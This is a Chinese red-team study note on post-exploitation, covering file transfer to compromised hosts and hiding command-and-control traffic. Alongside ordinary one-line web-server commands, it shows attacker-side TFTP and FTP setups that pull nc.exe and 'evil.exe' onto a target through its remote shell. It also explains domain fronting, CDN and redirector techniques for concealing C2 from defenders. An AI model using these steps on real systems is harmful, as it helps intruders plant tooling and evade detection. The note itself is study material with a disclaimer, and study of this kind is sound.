学习笔记-后渗透

后渗透

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

大纲

横向扩展
- 基于IPC$的横向
- PTH/PTK/PTT
- 文件传输
  - web-servers
  - FTP
  - Linux
  - Win
隐匿技术
权限提升
权限维持
windows域

后渗透案例

横向扩展

基于IPC$的横向

IPC$

PTH/PTK/PTT

基于RPC的taskexec

相关文章

Advanced Windows Task Scheduler Playbook-Part.3 Lateral Movement

文件传输

相关文章

红队后渗透测试中的文件传输技巧

web-servers

相关工具

sc0tfree/updog - 用于替代 Python 的 SimpleHTTPServer 的工具,自带401认证服务
```
pip3 install updog
updog --port 8888 --password test1234
```
projectdiscovery/simplehttpserver - Go alternative of python SimpleHTTPServer

本地服务

以下部分内容来自部分内容来自部分内容来自项目 ^{[willurd/web-servers.md]}

在当前目录起个 8000 端口的 HTTP 服务

Python 2.x
```
python -m SimpleHTTPServer 8000
```

Python 3.x

python3 -m http.server 8000 --bind 0.0.0.0

Twisted _^(Python)

twistd -n web -p 8000 --path .

python -c 'from twisted.web.server import Site; from twisted.web.static import File; from twisted.internet import reactor; reactor.listenTCP(8000, Site(File("."))); reactor.run()'

Ruby

ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start'

Ruby 1.9.2+
```
ruby -run -ehttpd . -p8000
```

adsf _^(Ruby)

gem install adsf   # install dependency
adsf -p 8000

Sinatra _^(Ruby)

gem install sinatra   # install dependency
ruby -rsinatra -e'set :public_folder, "."; set :port, 8000'

Perl

cpan HTTP::Server::Brick   # install dependency
perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>8000); $s->mount("/"=>{path=>"."}); $s->start'

Plack _^(Perl)

cpan Plack   # install dependency
plackup -MPlack::App::Directory -e 'Plack::App::Directory->new(root=>".");' -p 8000

Mojolicious _^(Perl)

cpan Mojolicious::Lite   # install dependency
perl -MMojolicious::Lite -MCwd -e 'app->static->paths->[0]=getcwd; app->start' daemon -l http://*:8000

http-server _^(Node.js)

npm install -g http-server   # install dependency
http-server -p 8000

node-static _^(Node.js)

npm install -g node-static   # install dependency
static -p 8000

PHP _{^{(>= 5.4)}}
```
php -S 127.0.0.1:8000
```

Erlang

erl -s inets -eval 'inets:start(httpd,[{server_name,"NAME"},{document_root, "."},{server_root, "."},{port, 8000},{mime_types,[{"html","text/html"},{"htm","text/html"},{"js","text/javascript"},{"css","text/css"},{"gif","image/gif"},{"jpg","image/jpeg"},{"jpeg","image/jpeg"},{"png","image/png"}]}]).'

busybox httpd
```
busybox httpd -f -p 8000
```
webfs
```
webfsd -F -p 8000
```

IIS Express

C:\> "C:\Program Files (x86)\IIS Express\iisexpress.exe" /path:C:\MyWeb /port:8000

FTP

tftp

基于 udp,端口为 69

攻击端起 tftp

mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
chown -R nobody /tftp

目标机
```
tftp -i <kali-ip> GET nc.exe
```

ftp

攻击端

apt-get install -y pure-ftpd

groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd username -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
./setup-ftp(输入要设置的密码)

攻击端使用 python 起 ftp:

pip3 install pyftpdlib
cd /tmp
python3 -m pyftpdlib -p 8888

此时目标机连接的时候,用户名为 anonymous,密码随意

目标机
目标机的远程 shell 上运行

echo open <kali-ip> 21> ftp.txt
echo username>> ftp.txt
echo password>> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

目标机上传文件(连接状态):

ftp> put target.exe(如果是 windows 且文件在其他盘,需使用绝对路径)

关闭 ftp:

/etc/init.d/pure-ftpd stop

windows下

ftp
username
password
get file
exit 或者 bye

ftp -s:test.txt

Linux lol

Linux LOL

Win lol

Windows LOL

隐匿技术

流量隐藏技术

相关文章

C2隐藏技术

相关工具

wikiZ/RedGuard - C2设施前置流量控制技术
mgeeky/RedWarden - Cobalt Strike C2 Reverse proxy that fends off Blue Teams, AVs, EDRs, scanners through packet inspection and malleable profile correlation
- https://www.freebuf.com/articles/network/277694.html

相关文章

利用CDN、域前置、重定向三种技术隐藏C2的区别

CDN

让 cdn 转发合法的 http 或者 https 流量来达到隐藏的目的。

受害主机上只会有跟 cdn 的 ip 通信的流量，不会有跟真实 C2 通信的流量，可以保护 C2 的 ip，但是域名还是会暴露。

相关文章

实验

CDN+C2实验

域前置

Domain fronting

同一个 cdn 厂商下倘若有两个域名 a.com，b.com，这两个主机都是被 ip 为 1.1.1.1 的 cdn 进行加速的。这时候我们使用 curl 命令访问第一个 a.com 并将 host 名改为 b.com 这时候，实际访问的是 b.com 的内容。而一般的监测机制是不会检测 host 头的。

curl 1.1.1.1 -v     # 无内容
curl 1.1.1.1 -H "Host: www.ffffffff0x.com" -v   # 访问到 cdn 下站点的内容

通过一个高信任域名隐藏自己的真实域名与 ip，且受害主机上只有跟 cdn 通信的流量。

相关文章

重定向

两台 vps，一台做重定向，一台是真正的 C2，而受害者只与那台做重定向的机器通信，重定向机器只会转发来自 beacon 的特定流量到 C2 控制端主机，对于其他流量可以自定义设置处理方法，一般是采用重定向到一些高信誉域名上例如百度等。

受害者上只会有与重定向机器之间的流量，不会有与真实 c2 服务器的流量，重定向服务器会将非 beacon 的请求重定向到一些高信誉域名上，达到迷惑的目的，不过如果受害者 ban 掉了重定向机器的 ip，对攻击者的损失也是很大的。

相关文章

相关项目

cedowens/Mod_Rewrite_Automation - Scripts to automate standing up apache2 with mod_rewrite in front of C2 servers.
threatexpress/cs2modrewrite - Convert Cobalt Strike profiles to modrewrite scripts

实验